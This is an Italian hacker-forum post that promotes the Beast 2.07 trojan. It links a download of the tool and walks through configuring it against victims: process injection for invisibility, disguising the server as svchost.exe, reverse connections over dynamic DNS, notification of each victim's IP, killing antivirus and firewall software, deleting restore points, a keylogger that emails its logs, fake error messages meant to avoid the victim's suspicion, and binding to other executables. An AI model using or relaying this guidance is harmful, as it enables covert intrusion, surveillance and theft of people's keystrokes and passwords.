BEAST la bestia - Il Forum dell'Hacker

Le informazioni contenute in questo Forum sono esclusivamente a scopo informativo, pertanto non mi riterrò responsabile di eventuali danni provocati da un uso improprio da parte degli utenti. Declino ogni responsabilità per l’uso l’utilizzo e/o l’abuso.
 
IndiceCalendarioFAQCercaLista UtentiGruppiRegistratiAccedi

Condividere | 
 

 BEAST 2.07: Il miglior Trojan secondo me

Vedere l'argomento precedente Vedere l'argomento seguente Andare in basso 
AutoreMessaggio
Admin
Admin
avatar

Messaggi : 19
Data d'iscrizione : 04.02.09
Località : Salerno

MessaggioTitolo: BEAST 2.07: Il miglior Trojan secondo me   Ven Feb 20, 2009 10:44 pm

BEAST 2.07: IL MIGLIOR TROJAN SECODO ME
http://www.elios88.altervista.org/hacker/Beast_v2.07_06-08-2004.zip

http://www.beastdoor.altervista.org (sito non ufficiale)

Beast è un potente software di Amministrazione Remota (conosciuto anche come trojan) scritto in Delphi.

Una proprietà che contraddistingue Beast da altri programmi simili è l'avere client, server, server editor e plugins inserite nella stessa applicazione. E' inoltroe implementato all'interno dell'applicazione un Binder. Beast 2.07 è un trojan completo in quanto può usufruire di due tipi di connessione: inversa e diretta. Il settaggio di default è la diretta, usata nelle versioni precedenti di Beast (2.02 ecc..) dove il server apriva una porta e aspettava al connessione dal client. La connessione inversa (opzione utilizzabile dalla versione 2.05) fa rimanere il client in attessa della connessione da parte dei server on-line, usando il S.I.N. (Static Ip Notification). Questo metodo ha molti vantaggi, di cui il principale è che Beast può essere usato anche con Router o attraverso Lan (rete). Il server può essere estratto dall'applicazione principale e la sua dimensione è di soli 30k (compresso) se non vien e usata l'opzione di injection. Se si sceglie un server che userà l'injection in Explorer.exe o in un'altra applicazione, la sua dimnsione sarà di 49k (compresso), una dimensione notevolmente piccola se si considerano le potenzialità di quest'applicazione! Beast ha inoltre all'interno un sistema di caricamento di plugin, riguardanti i programmi di uso pù comune: Screen Manager e Passwords (ICQ, Cartelle Protette e Connessioni).

Come si può conoscere avendo usato le versione precedenti, un'importante carattersitica del server è l'uso della tecnologia di Injecting. Al primo avvio, il servr si inietta nella memoria di Explorer.exe (nei sistemi Win 9x in Systray.exe). Dopo di questo, da explorer.exe vengono effettuate iniezioni in altri hosts (nel caso il server non sia configurato per l'iniezione in Explorer.exe) configurate precedentemente durane la creazione del server. Il beneficio principale tratto da queste operazioni è il fatto che da Explorer.exe sono monitorate the altre applicazioni infettate e, per esempio, se Internet Explorer viene chiuso, da Explorer.exe sarà riavviato e iniettato con la dll. Se il server risiede in Explorer.exe, non sarà visibile in nessun Task Manager e quindi è una buona opzione. Quando il server è iniettato in Internet Explorer, sarà visibile nel Task Manager, ma in questo modo saranno bypassati più facilmente i FireWalls, e non è poi così una gran perdita la visibilità nel task manager, poichè se IE viene terminato, sarà automaticamente riavviato Wink. La stabilità del server è praticamente garantita al 100% e non può andare in crash chiudendo il client durante un file transfer o altre operazioni. Solitamente il server (dll) risiede nella directory Windows\system. Con Beast 2.07 non sono richiesti privilegi di amministratore su sistemi NT (2k, XP) il server può essere eseguito anche da un'utente con account ristretto (Guest, ecc..) e in questo caso risiederà nella Directory Documents and Settings.

Beast è abbastanza difficile da rimuovere, specialmente se usa ll'injecting. In questo caso, un buon metodo per effettuare la rimozione è eseguire Windows in modalità provvisoria. Ho implementato in Beast una feature di extra persistenza nel sistema, perciò qualsiasi volta che il processo infettato viene chiuso, da explorer.exe (Systray.exe in Win9x), il server sarà Re-iniettato e la chiave di registro riscritta entro pochi secondi...

SETTAGGI DEL SERVER

Prima di tutto bisogna creare il server dall'applicazione principale (Client). Quando si esegue Beast, nella finestra che viene aperta, si può notare il bottone Build Server. Clicckare su di esso e si aprirà la finestra per la configurazione del server.

Vediamo ogni configurazione singolarmente.

Settaggi di base
Nel gruppo dei Settaggi di Base si possono scegliere nome del server, porta e password, tipo di connessione e directory dove si vuole che risieda l'applicazione infettata (IE, Explorer.exe o applicazione a scelta) in caso si crei un server con injection. I Settaggi di default creano un server eseguito come normale applicazione (senza injection) con connessione inversa, nome svchost.exe e usa la porta 9999 per la connessione. In questo caso (inversa) il server non rimarrà in ascolto su nessuna porta e non sarà richiesta nessuna password per la connessione. Per la connessione inversa è richiesta la configurazione del SIN, spiegata nel paragrafo successivo. I Settaggi di default possono essere cambiati con i propri con particolare attenzione ai nomi da dare al server, poichè è fortemente raccomandato non dare nomi di processi già in uso (svchost.exe, services.exe, lsass,exe ecc) e settare la directory di sistema come Dir di residenza. Per esempio, se il server si chiama svchost.exe, la sua locazione dovrà essere in Windows, poichè in system esiste ed è già in esecuzione un file di nome svchost.exe. Se si sceglie il metodo Injection si hanno poche opzioni: Inject in Explorer.exe (completa invisibilità in Task Manager), Internet Explorer (più probabilità di bypassare FireWalls) o altre applicazioni a scelta. Nel secondo caso, sia che IE sia in esecuzione o meno alla prima infezione con Beast, il server esegue una sessione nascosta di IE per l'injection.

Notifica
In questo gruppo si possono settare il metodo preferito in cui si verrà avvertiti che il server è on-line. Se in precedenza si è scelto la connessione inversa, deve essere usata la configurazione del S.I.N. Il tempo di default per il timeout del SIN è di 15 secondi e può essere cambiato. Nel caso si abbia lo stesso IP assegnato ogni volta che si è on.line, le cose si semplificano: tutto quello che bisogna fare è settare quell'ip nei settaggi del server e quanto la macchina remota sarà on line tenterà di connettersi al client in ascolto; in un caso si abbia un IP dinamico, si deve andare in http://www.no-ip.com o http://www.mine.nu e creare (liberamente) un indirizzo statico, tipo TuoNome@no-ip.com. Dopo aver creato il proprio indirizzo NO-ip, si deve eseguire sul proprio pc il client fornito da loro. Il no-Ip client si connette al no-ip database ogni 10 minuti con il reale indirizzo ip, in questo modo chiunque si connetta al dominio, sarà re-indirizzato al proprio indirizzo IP. Se si è sotto Router bisogna "saltare" 9 porte, da 9999 (Porta SIN) a 10008 (Porta SIN + 9). Questo è tutto quanto riguarda la connessione inversa.
Nel caso si usi la connessione diretta, si hanno 3 opzioni di notifica: ICQ, E-mil e CGI. Quando si riceve l'IP della vittima, si ricevono automaticamente la porta e la password (facoltativa) del server. La notifica via ICQ alcune volte potrebbe essere down, perciò è bene non dimenticare di testarla prima di configurarla nel server. La notifica via E-Mail è una buona scelta, ma non funziona con account hotmail. Anche questa opzione può essere testata durante la creazione del server ed il messaggio è completamente personalizzabile. Nella configurazione della notifica via E-Mail, nel campo dell'Indirizzo SMTP devono essere scritte le esatte informazioni per l'indirizzo mail scelto e per questo si pò usare il pulsante Get SMTP. Per la notifica CGI ho usato uno script di Net-Devil. Per primo bisogna creare un sito web che supporti il CGI (si può crearne uno libero in www.netfirms.com). Nell'URL del CGI deve essere scritto un path tipo http://ProprioNome.netfirms.com/cgi-bin/log.cgi, l CGI script Data può essere lasciato com'è e la CGI password sarà la password per accedere al log dal browser di internet (l'indirizzo per addecervi è http://ProprioNome.netfirms.com/cgi-bin/list.cgi e sarà richiesta la password). Ora clicckare il pulsante Create CGI Files e un file con i settaggi appena scelti sarà creato nella propria directory di cgi-bin. Dopo l'upload gli attributi del file devono essere cambiati (CHMOD): per log, cgi e list.cgi deve essere 755, per log.txt 600. Finito.
Non dimenticare di abilitare l'opzione di Enable per il metodo di notifica scelto.Avvio
Nel Setting dello startUp si possono scegliere 3 tipi di avvio (è raccomandato selezionarli tutti).

AV-FW Killing (Disattivazione AntiVirus & FireWall)
'L'opzione Kill AV-FW On Start è selezionata in automatico. Nella lista interna di Beast ci sono più di 300 eseguibili di FireWall-AntiVirus e si può aggiungerne di personalizzate (fino ad un massimo di 500). La chiusura dell' AV o FW può avere luogo ad ogni avvio e ogni intervallo di tempo specificato dall'utente (tra 5 e 9999 secondi). Il server termina anche alcuni servizi di NT, non solo applicazioni esterne. Il Firewall interno di XP può essere disattivato selezionando l'opzione appropriata.

Varie
L'opzione Melt Server On Install è selezionata in automatico. Durante la configurazione del server, il nome dato all'eseguibile è server.exe, ma può essere cambiato in quasliasi momento. Se facciamo doppio click sul server, esso scompare (verrà nascosto). Tutto quello che è successo è che l'eseguibile ha copiato se stesso nella directory / con il nome dato in precedenza ed è in esecuzione silenziosa. Dopo la creazione, il server può essere agganciato ad un altro eseguibile arbitrario, è per questo che ho aggiunto l'opzione di Binder. Se si disabilità l'opzione di Melt, il server si copierà solamente nel sistema (e si eseguirà, ovviamente). Un'altra utile opzione è il set del falso messaggio di errore (Fake Error Message): se selezionata, quando il server viene eseguito per la prima volta, presenta un falso errore di esecuzione, in modo da non destare sospetti nella vittima (il melt è solitamente usato con il binding, mentre il fake error quando si spedisce il server in se).Altra opzione possibile è l'aprire porte in ascolto (in caso di connessione diretta) solo quando il server è on line, di modo che rimanga più nascosto. L'opzione Enable KeyLogger (Registrazione di eventi) è selezionata di default e il file di log è completamente personalizzabile (nome e limite di grandezza); tutti i tasti premuti e le finestre aperte sono registrate nel file di log (criptato). Il keyLog funziona on-line e off-line e dal client si può trasferirlo sul proprio pc, decriptarlo e successivamente leggerlo, ma si può anche settare il server in modo che il log venga spedito per mail (in questo caso, dando la mail di destinazione ed il limite del log per la spedizione, ad esempio, ogni volta che raggiunge i 30k). Altre opzioni sono la cancellazione di punti di ripristino in XP e l'esecuzione in differita del server (dopo un certo tempo, ad una certa data o dopo un certo numero di riavvii)

Icona
L'icona del server può essere cambiata con alcune presenti durante la creazione o con una scelta a piacere dal proprio disco, da file.ico a eseguibile. L'icona del server avrà dimensioni di 32x32 pixels e 16 colori.

Settaggi
Tutti i settings del server possono essere salvati/caricati in/da un file specifico (.bst). Quando si vuole creare un server con settings usati in precedenza e salvati, basta fare doppio click su di esso.

Binder
Beast 2.07 ha un binder incluso Smile Il binder è semplice ma efficace, può agganciare qualsiasi file si voglia (se i file agganciati non sono eseguibili, verranno aperti con l'applicazione di default). L'aggiunta per il binding è molto piccola (circa 5kb).
Tornare in alto Andare in basso
Vedi il profilo dell'utente http://beast.forumitalian.com
 
BEAST 2.07: Il miglior Trojan secondo me
Vedere l'argomento precedente Vedere l'argomento seguente Tornare in alto 
Pagina 1 di 1
 Argomenti simili
-
» Qual'è la migliore marca di telefonini ?
» Quanto guadagna Google all'anno?
» Qual'è la migliore marca di camion?
» Programma per generare numeri casuali - Random Number Generator
» Simulatore di agricoltura - Professional Farmer

Permessi di questa sezione del forum:Non puoi rispondere agli argomenti in questo forum
BEAST la bestia - Il Forum dell'Hacker :: TROJAN-
Andare verso: